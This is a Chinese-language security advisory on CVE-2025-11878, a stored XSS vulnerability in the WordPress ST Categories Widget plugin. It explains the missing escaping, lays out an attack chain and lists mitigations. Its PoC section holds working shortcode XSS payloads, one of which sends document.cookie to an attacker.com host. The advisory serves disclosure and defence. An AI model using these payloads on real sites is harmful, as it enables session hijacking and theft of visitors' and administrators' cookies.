CVE-2025-11878：WordPress ST Categories Widget插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11878

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress ST Categories Widget插件（st-category-wp）

漏洞概述

CVE-2025-11878是WordPress平台上ST Categories Widget插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由Wordfence安全团队的安全研究员发现，并于2025年10月22日公开披露。该漏洞的CVSS 3.1评分为6.4分，属于中危级别。

ST Categories Widget是一款用于在WordPress网站中展示文章分类目录的Widget小工具插件，允许用户通过短代码（shortcode）的方式在页面或文章中插入分类列表。然而，该插件在1.0.0及之前所有版本中，对短代码属性的输入过滤和输出转义处理存在严重不足，未能对用户提交的属性值进行充分的清理和转义。

该漏洞允许具有Contributor（投稿者）级别及以上权限的认证攻击者，在文章或页面中注入恶意的JavaScript脚本代码。当其他用户（包括管理员）访问包含恶意代码的页面时，注入的脚本将在受害者浏览器中自动执行，可能导致会话劫持、权限提升、钓鱼攻击、数据窃取等一系列安全问题。由于WordPress网站的访问量通常较大，该漏洞一旦被利用，影响范围可能非常广泛。

技术细节

该漏洞的核心问题在于ST Categories Widget插件的st-categories短代码实现中，对用户提供的属性参数缺乏充分的输入验证和输出转义机制。

从技术原理上看，WordPress的短代码机制允许插件注册自定义短代码标签，如[st-categories attribute="value"]。当插件处理这些短代码时，通常需要通过PHP函数（如shortcode_atts、extract等）解析属性值，并在最终输出到HTML页面时使用echo或print等函数渲染。

在存在漏洞的代码（st-categories-wp.php第176行附近）中，插件直接使用了用户提供的短代码属性值，而没有调用WordPress提供的安全函数进行转义处理，例如：
- 未使用esc_html()、esc_attr()、esc_url()等转义函数
- 未使用wp_kses()进行HTML内容过滤
- 未对用户输入进行严格的类型检查和白名单验证

攻击者可以利用这一缺陷，在短代码属性中注入类似"onmouseover='alert(document.cookie)'"或"<script>...</script>"等恶意内容。由于这是存储型XSS，恶意payload会被持久化保存在WordPress数据库的文章内容中，每当有用户访问该文章页面时，恶意脚本就会在用户浏览器上下文中执行。

由于漏洞利用需要Contributor级别权限（属于低权限认证要求），且无需用户交互（UI:N），同时攻击范围发生变化（S:C），因此CVSS评分达到6.4分。

攻击链分析

STEP 1

步骤1：获取权限

攻击者首先获取目标WordPress网站的Contributor（投稿者）级别或更高权限的账户，可以通过注册新账户（如果网站开放注册）或通过社工、凭证填充等方式获取已有账户。

STEP 2

步骤2：构造恶意短代码

攻击者构造包含恶意JavaScript代码的st-categories短代码，将恶意payload嵌入到短代码的属性值中，如title属性。

STEP 3

步骤3：注入存储

攻击者创建新的文章或页面，将恶意短代码插入到内容中并发布。由于缺乏输入过滤，恶意脚本被存储到WordPress数据库中。

STEP 4

步骤4：触发执行

当任何用户（包括管理员）访问包含恶意短代码的页面时，浏览器解析HTML并执行注入的JavaScript代码。

STEP 5

步骤5：实施攻击

恶意脚本在受害者上下文中执行，可窃取Cookie、会话令牌，进行权限提升，或执行其他恶意操作如钓鱼、挖矿、重定向等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2025-11878 -->
<!-- Attack Steps: -->
<!-- 1. Login to WordPress as Contributor or higher -->
<!-- 2. Create a new post -->
<!-- 3. Insert the following malicious shortcode into the post content -->
<!-- 4. Publish the post -->
<!-- 5. When any user visits the post, the XSS payload executes -->

[st-categories title="<script>alert('XSS-'+document.cookie)</script>"]

<!-- Alternative PoC with event handler (may bypass some filters): -->

[st-categories title="Test\" onmouseover=\"alert(document.domain)\" style=\"display:block\"]

<!-- PoC for stealing cookies / session hijacking: -->

[st-categories title="<img src=x onerror=\"fetch('https://attacker.com/steal?c='+document.cookie)\">"]

影响范围

ST Categories Widget（st-category-wp）<= 1.0.0

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）暂时停用ST Categories Widget插件，直到官方发布安全更新；2）通过Wordfence等安全插件启用XSS防护规则；3）限制Contributor及以上角色的用户权限，审查已有用户账户；4）在wp-config.php或.htaccess中配置Content-Security-Policy头，限制脚本执行来源；5）定期检查网站文章内容，及时清理可疑的短代码；6）启用WordPress的双因素认证（2FA），降低账户被盗风险。